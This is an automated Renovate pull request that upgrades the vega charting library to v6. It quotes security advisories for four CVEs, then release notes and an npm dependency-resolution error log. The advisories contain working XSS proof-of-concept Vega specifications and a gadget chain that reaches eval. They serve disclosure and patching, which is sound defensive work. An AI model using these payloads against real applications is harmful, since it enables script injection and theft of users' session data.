fix(dependencies): update dependency vega to v6 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
vega	^5.20.2 -> ^6.0.0

GitHub Vulnerability Alerts

CVE-2025-25304

Summary

The vlSelectionTuples function can be used to call JavaScript functions, leading to XSS.

Details

vlSelectionTuples calls multiple functions that can be controlled by an attacker, including one call with an attacker-controlled argument.

Example call: vlSelectionTuples([{datum:<argument>}], {fields:[{getter:<function>}]})

This can be used to call Function() with arbitrary JavaScript and the resulting function can be called with vlSelectionTuples or using a type coercion to call toString or valueOf.

PoC

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","init":"+{valueOf:vlSelectionTuples([{datum:'alert(1)'}],{fields:[{getter:[].at.constructor}]})[0].values[0]}"}]}

CVE-2025-26619

Impact

In vega 5.30.0 and lower, vega-functions 5.15.0 and lower , it was possible to call JavaScript functions from the Vega expression language that were not meant to be supported.

Patches

Patched in vega 5.31.0 / vega-functions 5.16.0

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

• Run vega without vega.expressionInterpreter. This mode is not the default as it is slower.
• Using the interpreter described in CSP safe mode (Content Security Policy) prevents arbitrary Javascript from running, so users of this mode are not affected by this vulnerability.

References

• Reported to Vega-Lite by @​kprevas Nov 8 20https://github.com/vega/vega-lite/issues/9469s/94https://github.com/vega/vega/issues/3984s/3984

Reproduction of the error in Vega by @​mattijn

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "signals": [
    {
      "name": "inject_alert",
      "on": [
        {
          "events": [
            {
              "type": "mousedown",
              "marktype": "rect",
              "filter": ["scale(event.view.setTimeout, 'alert(\"alert\")')"]
            }
          ],
          "update": "datum"
        }
      ]
    }
  ],
  "marks": [
    {
      "type": "rect",
      "encode": {
        "update": {
          "x": {"value": 0},
          "y": {"value": 0},
          "width": {"value": 100},
          "height": {"value": 100}
        }
      }
    }
  ]
}

CVE-2025-27793

Impact

Users running Vega/Vega-lite JSON definitions could run unexpected JavaScript code when drawing graphs, unless the library is used with the vega-interpreter.

Workarounds

• Use vega with expression interpreter
• Upgrade to a newer Vega version (5.32.0)

POC Summary

Calling replace with a RegExp-like pattern calls RegExp.prototype[@​@​replace], which can then call an attacker-controlled exec function.

POC Details

Consider the function call replace('foo', {__proto__: /h/.constructor.prototype, global: false}). Since pattern has RegExp.prototype[@​@​replace], pattern.exec('foo') winds up being called.

The resulting malicious call looks like this:

replace(<string argument>, {__proto__: /h/.constructor.prototype, exec: <function>, global: false})

Since functions cannot be returned from this, an attacker that wishes to escalate to XSS must abuse event.view to gain access to eval.

Reproduction steps

{"$schema":"https://vega.github.io/schema/vega/v5.json","signals":[{"name":"a","on":[{"events":"body:mousemove{99999}","update":"replace('alert(1)',{__proto__:/h/.constructor.prototype,exec:event.view.eval,global:false})"}]}]}

CVE-2025-59840

Impact

Applications meeting 2 conditions are at risk of arbitrary JavaScript code execution, even if "safe mode" expressionInterpreter is used.

1. Use vega in an application that attaches vega library and a vega.View instance similar to the Vega Editor to the global window
2. Allow user-defined Vega JSON definitions (vs JSON that was is only provided through source code)

Patches

• If using latest Vega line (6.x)
  • vega 6.2.0 / vega-expression 6.1.0 / vega-interpreter 2.2.1 (if using AST evaluator mode)
• If using Vega in a non-ESM environment
  • ( vega-expression 5.2.1 / 1.2.1 (if using AST evaluator mode)

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading

• Do not attach vega View instances to global variables, as Vega editor used to do here
• Do not attach vega to the global window as the editor used to do here

These practices of attaching the vega library and View instances may be convenient for debugging, but should not be used in production or in any situation where vega/vega-lite definitions could be provided by untrusted parties.

POC Summary

Vega offers the evaluation of expressions in a secure context. Arbitrary function call is prohibited. When an event is exposed to an expression, member get of window objects is possible. Because of this exposure, in some applications, a crafted object that overrides its toString method with a function that results in calling this.foo(this.bar), DOM XSS can be achieved.

In practice, an accessible gadget like this exists in the global VEGA_DEBUG code.

({
    toString: event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, 
    eventName: event.view.console.log,
    _handlers: {
        undefined: 'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'
    },
    _handlerIndex: event.view.eval
})+1

POC Details

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": true,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "({toString:event.view.VEGA_DEBUG.vega.CanvasHandler.prototype.on, eventName:event.view.console.log,_handlers:{undefined:'alert(origin + ` XSS on version `+ VEGA_DEBUG.VEGA_VERSION)'},_handlerIndex:event.view.eval})+1"
        }

      ]
    }
  ]
}

This payload creates a scenario where whenever the mouse is moved, the toString function of the provided object is implicitly called when trying to resolve adding it with 1. The toString function has been overridden to a "gadget function" (VEGA_DEBUG.vega.CanvasHandler.prototype.on) that does the following:

   on(a, o) {
        const u = this.eventName(a)
          , d = this._handlers;
        if (this._handlerIndex(d[u], a, o) < 0) {
        ....
        }
        ....
   }

1. Set u to the result of calling this.eventName with undefined
   • For our object, we have the eventName value set to console.log, which just logs undefined and returns undefined
2. Sets d to this._handlers
   • For our object, we have this defined to be used later
3. Calls this._handlerIndex with the result of u indexed into the d object as the first argument, and undefined as the second two.
   • For our object, _handlerIndex is set to window.eval, and when indexing undefined into the _handlers, a string to be evald containing the XSS payload is returned.

This results in XSS by using a globally scoped gadget to get full blown eval.

PoC Link

Navigate to vega editor, move the mouse, and observe that the arbitrary JavaScript from the configuration reaches the eval sink and DOM XSS is achieved.

Future investigation

In cases where VEGA_DEBUG is not enabled, there theoreticallycould be other gadgets on the global scope that allow for similar behavior. In cases where AST evaluator is used and there are blocks against getting references to eval, in theory there could be other gadgets on global scope (i.e. jQuery) that would allow for eval the same way (i.e. $.globalEval). As of this writing, no such globally scoped gadgets have been found.

Impact

This vulnerability allows for DOM XSS, potentially stored, potentially reflected, depending on how the library is being used. The vulnerability requires user interaction with the page to trigger.

An attacker can exploit this issue by tricking a user into opening a malicious Vega specification. Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the application’s domain. This can lead to theft of sensitive information such as authentication tokens, manipulation of data displayed to the user, or execution of unauthorized actions on behalf of the victim. This exploit compromises confidentiality and integrity of impacted applications.

---

Release Notes

vega/vega (vega)

v6.2.0

Compare Source

v6.1.2

Compare Source

v6.1.1

Compare Source

v6.1.0

Compare Source

v6.0.0

Compare Source

changes since v5.33.0

monorepo

• Vega is now ESM only! (via #​4018) (Thanks @​domoritz!)
• (fix) Correct browser export syntax (via #​4039) (Thanks @​domoritz!)
• (fix) Fix source maps (via #​4041) (Thanks @​domoritz!)
• (fix) handle string datetime in interpreter (via #​4042) (Thanks @​domoritz!)

vega-typings

• Expose resetSVGDefIds (via #​4012) (Thanks @​domoritz!)

docs

• Update deps and datasets (via #​4036) (Thanks @​domoritz!)

v5.33.0

Compare Source

Changes since v5.32.0

docs

• Add release number to docs for base64 encode/decode (atob, btoa) (via #​4023). (Thanks @​hydrosquall!)
• Fix docs for exponential regression (via #​4024). (Thanks @​elliot-at-looker!)

v5.32.0

Compare Source

Changes since v5.31.0

vega-expression

• Add base64 string encoder/decoder to vega-expression and vega-interpreter (via #​4009). (Thanks @​hydrosquall!)

vega-typings

• Add Typescript Types for vega-loader (via #​4000). (Thanks @​hydrosquall!)

docs

• Correct data year citation in dorling-cartogram example (via #​4006). (Thanks @​dsmedia!)
• Update typo in vega.timeFloor description (via #​4010). (Thanks @​hydrosquall!)
• Add Security Advisory Policy for Vega (via #​4008). (Thanks @​hydrosquall!)
• Replace redirect url in expressions.md (via #​3996). (Thanks @​dangotbanned!)
• correct queries to query in crossfilter.md (via #​4005). (Thanks @​danmarshall!)

v5.31.0

Compare Source

changes since v5.30.0

vega-utils

• use Object.hasOwn instead of Object.prototype.hasOwnProperty (via #​3951). (Thanks @​domoritz!)

vega-parser

• Add discrete legend type (via #​3957). (Thanks @​hydrosquall!)

vega-functions

• Add sort function to vega-functions (and vega-interpreter) (via #​3973). (Thanks @​hydrosquall!)

vega-selections

• Add field predicate types to selectionTest (via #​3675). (Thanks @​jonathanzong!)

monorepo

• Replace flights-5k.json external reference (via #​3999). (Thanks @​dwootton!)

docs

• Update packed bubble example (via #​3955). (Thanks @​PBI-David!)
• Correct typo in production rules documentation (via #​3958). (Thanks @​shanebruggeman!)
• Update README.md to fix broken link to current roadmap (via #​3979). (Thanks @​cahogan & @​joelostblom!)

v5.30.0

Compare Source

Changes since v5.29.0

vega-functions

• make default vega format null as "null" (via #​3926). (Thanks @​kanitw & @​domoritz )!

docs

• Add 4 new examples (via #​3851). (Thanks @​avatorl & @​domoritz!)

monorepo

• Deploy editor preview (via #​3925, #​3931). (Thanks @​hydrosquall!)
• Bump all vega-* deps in topological order to eliminate version mismatches within the monorepo (via #​3932). (Thanks @​lsh!)

v5.29.0

Compare Source

docs

• remove Google Analytics. (via #​3894) (Thanks @​domoritz!)

monorepo

• switch to ESLint flat config file. (via #​3920) (Thanks @​lsh!)
• update node versions in ci. (via #​3915) (Thanks @​domoritz!)

vega-encode

• use domainMin and domainMax to set scale padding. (via #​3906) (Thanks @​jami159 & @​lsh!)

vega-scale

• Add observable10 palette. (via #​3843) (Thanks @​mcnuttandrew!)
• Respect tickMinStep for binned scale. (via #​3904) (Thanks @​alexxu-db!)

vega-scenegraph

• Revert TooltipHideEvent to MouseOutEvent to fix events on mobile. (via #​3909) (Thanks @​kadamwhite!)

vega-typings

• Add observable10 palette. (via #​3843) (Thanks @​mcnuttandrew!)

vega-view

• turn off all handlers in View.finalize() to fix memory leak. (via #​3896) (Thanks @​cmerrick!)

v5.28.0

Compare Source

changes from v5.27.0

docs

• addition of the serpentine timeline example (via #​3858). (Thanks @​Giammaria!)
• update to the zoomable circle packing example (via #​3857). (Thanks @​Giammaria and @​domoritz!)
• update vega datasets (via #​3863). (Thanks @​domoritz!)

vega-parser

• allow signals in scale nice (via #​3887). (Thanks @​lsh!)

vega-scenegraph

• convert some of the scenegraph types to classes (via #​3864). (Thanks @​lsh!)

vega-typings

• add missing aggregate_params to window transform type (#​3874). (Thanks @​julieg18!)
• bump typings to 1.2 (Thanks @​domoritz!)

v5.27.0

Compare Source

changes from v5.26.1:

docs

• Addition of an example: Zoomable Circle Packing (via #​3841 and #​3842). (Thanks @​Giammaria!)

monorepo

• add codeowners file. (Thanks @​domoritz!)
• replace indexOf with equivalent includes and startsWith (via #​3845). (Thanks @​domoritz!)

vega-scenegraph

• Fix blurry zoom from caching devicePixelRatio (via #​3844). (Thanks @​lsh!)

vega-transforms

• fix sum([invalid]) -> undefined (via #​3849). (Thanks @​nicolaskruchten!)
• fix: correct aggregate params types (via #​3846). (Thanks @​domoritz!)

vega-typings

• Add experimental 'hybrid' renderer to vega-typings (via #​3847). (Thanks @​jonmmease!)

vega-view

• Add option to resize on devicePixelRatio change (via #​3844). (Thanks @​lsh!)

v5.26.1

Compare Source

Changes from v5.26.1:

vega-scenegraph

• Fix CanvasHandler to emit mouse over/move/out events. (#​3825)

vega-typings

• Expose aggregate parameters in typings. (thanks @​Xitian9)

v5.26.0

Compare Source

Changes from v5.25.0:

vega-functions

• Add geoScale expression function. (thanks @​binste)

vega-scale

• Fix tickMinStep calculation. (thanks @​kanitw)

vega-scenegraph

• Add experimental hybrid canvas/SVG renderer (thanks @​jonmmease)
• Fall back to textMetrics.width for user defined width function (thanks @​jonmmease)

vega-selections

• Fix null handling in vlSelectionTest (thanks @​arvind, @​jonmmease)

vega-transforms

• Add aggregate parameters to vega-transform, and exponential moving average. (thanks @​Xitian9)

vega-typings

• Bump typings to a 1.0 release. (thanks @​domoritz)

vega-voronoi

• Fix reference for voronoi path point. (thanks @​suchanlee)

v5.25.0

Compare Source

Changes from v5.24.0:

monorepo

• Fix browser lists for IE support. (thanks @​domoritz!)
• Update dependencies.

vega-cli

• Add ppi resolution parameter for PNG output. (thanks @​davidanthoff!)
• Return error code on failure. (thanks @​davidanthoff!)

vega-expression

• Add hypot function. (thanks @​domoritz!)

vega-functions

• Update to use hypot.

vega-regression

• Allow zero-valued order for polynomial regression.

vega-statistics

• Add constant regression method.

vega-transforms

• Use robust (null proto) object for aggregate cell map. (#​3695)

vega-util

• Fix consecutive escapes in splitAccessPath #​3724 (thanks @​suchanlee!)

v5.24.0

Compare Source

Changes from v5.23.0:

monorepo

• Update dev dependencies.
• Fix duplicated code in bundle (#​3684).

vega-force

• Update Force transform schema to allow expression-valued nbody force strength.

vega-schema

• Update Force transform schema to allow expression-valued nbody force strength.

vega-typings

• Update Force transform schema to allow expression-valued nbody force strength.

---

Configuration

📅 Schedule: Branch creation - "" in timezone UTC, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

• any of the package files in this branch needs updating, or
• the branch becomes conflicted, or
• you click the rebase/retry checkbox if found above, or
• you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: packages/components/package-lock.json

npm ERR! code ERESOLVE
npm ERR! ERESOLVE could not resolve
npm ERR! 
npm ERR! While resolving: [email protected]
npm ERR! Found: [email protected]
npm ERR! node_modules/vega
npm ERR!   vega@"^6.0.0" from the root project
npm ERR!   peer vega@"*" from [email protected]
npm ERR!   node_modules/vega-themes
npm ERR!     vega-themes@"^2.10.0" from [email protected]
npm ERR!     node_modules/vega-embed
npm ERR!       vega-embed@"^6.18.2" from the root project
npm ERR! 
npm ERR! Could not resolve dependency:
npm ERR! peer vega@"^5.21.0" from [email protected]
npm ERR! node_modules/vega-embed
npm ERR!   vega-embed@"^6.18.2" from the root project
npm ERR! 
npm ERR! Conflicting peer dependency: [email protected]
npm ERR! node_modules/vega
npm ERR!   peer vega@"^5.21.0" from [email protected]
npm ERR!   node_modules/vega-embed
npm ERR!     vega-embed@"^6.18.2" from the root project
npm ERR! 
npm ERR! Fix the upstream dependency conflict, or retry
npm ERR! this command with --force, or --legacy-peer-deps
npm ERR! to accept an incorrect (and potentially broken) dependency resolution.
npm ERR! 
npm ERR! See /runner/cache/others/npm/eresolve-report.txt for a full report.

npm ERR! A complete log of this run can be found in:
npm ERR!     /runner/cache/others/npm/_logs/2025-11-18T14_58_20_636Z-debug-0.log